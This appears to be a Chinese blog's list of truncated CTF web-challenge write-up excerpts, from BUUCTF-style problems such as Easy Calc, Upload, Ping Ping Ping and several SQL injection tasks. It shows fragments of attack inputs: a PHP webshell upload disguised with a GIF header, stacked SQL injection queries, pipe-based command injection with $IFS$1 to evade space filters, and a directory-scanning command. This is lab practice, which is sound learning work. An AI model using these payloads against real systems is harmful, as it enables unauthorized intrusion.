[RoarCTF 2019]Easy Calc进去后是个页面，输入计算式，计算结果，没见过类似的题目啊,f12，发现有个calu.php,访问得到源码： 123456789101112131415<?phperror_reporting(0); //关闭错误报告if(!isset($_GET['num'])){ show_source(__FILE__);

[ACTF2020 新生赛]BackupFile扫目录一直扫不出来，扫了十来次，最后发现是是请求太快， 1dirsearch -u http://087da459-7de3-4061-82c8-b3cf69426d11.node5.buuoj.cn:81/ -w backup_include.txt --delay=1 -t 2 终于发现备份文件/index.php.bak 1234

[极客大挑战 2019]Upload123456Content-Disposition: form-data; name="file"; filename="php.phtml"Content-Type: image/jpegGIF89a<script language='php'>eval($_GET["z&quo

[BJDCTF2020]Easy MD5在bp查看相应，看到：hint: select * from ‘admin’ where password=md5($pass,true)试一下ffifdyop返回的页面中有： 1234567<!--$a = $GET['a'];$b = $_GET['b'];if($a != $b &&a

2019 review-强网杯-随便注再做一遍 12345678910111213141516171819202122231'show tables#1';show tables;#1';select group_concat(culumn_name);#return preg_match("/select|update|delete|drop|insert

[GXYCTF2019]Ping Ping Ping 1根据提示 1?ip=1 根据回复，那就是ping功能了，尝试用管道符连接命令： 1234?ip=1|lsflag.phpindex.php 直接就有flag，然后发现过滤了空格和flag,上网查如何绕过空格过滤最后使用$IFS$1 1234567891011121314151617181920?ip=1|cat$IFS$1index.php/

[suctf 2019]EasySQL老早就做过这题了，当初wp看的半知半解，现在是我想能算上是大彻大悟了吧 1select $_GET['query'] || flag from flag || 符是或的意思，应该就和注入中的 || , or 是一个用法 这里的||在mysql中表示或，如果前一个操作数为真，则不看后面的语句 网上最多的payload都是 1*,1

note-24sql刷不下去了，感觉每见一道题就要新学一个知识点，做了一些题目，遇到新题还得去找wp，心态崩 user: 我学web是该专刷一个地方，像专门刷sql还是泛刷题目? deepseek: 1234567891011121314151617181920212223242526272829303132333435(≧ω≦) 喵哒～这个问题就像选择「草莓蛋糕吃到饱」还是「甜品全席体验

ctfshow_web14一开始也试了传c，但是就试到2，然后以为是源码绕过的，看wp发现是sql注入。再试到3就能自己发现这个页面了，，，，，，，，/here_1s_your_f1ag.php按f12发现： if(preg_match(‘/information_schema.tables|information_schema.columns|linestring| |

[NewStarCTF 2023 公开赛道]midsql看了wp，只能说fuzz过程应该是最重要的，不然fuzz都fuzz不明白完全不知道下一步该干嘛也许我记得一些注入方法，但是如果连注入点或者注入方式都fuzz不出来也是完全没用看了wp后发现原理都懂，那为什么总是要看wp才能写出题目？就是不会fuzz，自己写的脚本： 1234567891011121314151617181920212223